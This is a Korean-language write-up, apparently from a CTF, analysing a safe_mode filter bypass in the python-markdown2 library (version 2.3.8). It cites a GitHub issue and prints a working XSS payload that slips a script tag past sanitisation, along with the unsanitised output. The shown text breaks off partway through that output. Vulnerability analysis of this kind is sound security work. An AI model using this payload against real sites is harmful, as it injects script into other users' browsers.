[python-markdown2] safe_mode Filter bypass 분석글
개요 * 작성일 기준 version: 2.3.8 ( https://github.com/trentm/python-markdown2/tree/4d2fc792abd7fbf8ddec937812857f13fded61cf ) CTF하다가 markdown2 모듈을 사용하길래 해당 모듈 찾아보다가 아래 이슈를 발견하였다. https://github.com/trentm/python-markdown2/issues/341 Filter Bypass ????!! - Expected Result ```python >>> import markdown2 >>> markdown2.markdown("[<script>alert(1)</script>]()", safe_mode=True) '<p><a href="#">[HTML_REMOVED]alert(1)[HTML_REMOVED]</a></p>\n' ``` - Issue Payload ```python >>> import markdown2 >>> markdown2.markdown('<http://g<!s://q?<!-<[<script>alert(1);/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(1);/*](http://g)->a>', safe_mode=True) '<p><http://g<!s://q?<!-<<a href="http://g"><script>alert(1);/*</a>->a><http://g<!s://g.c?<!-<<a href=...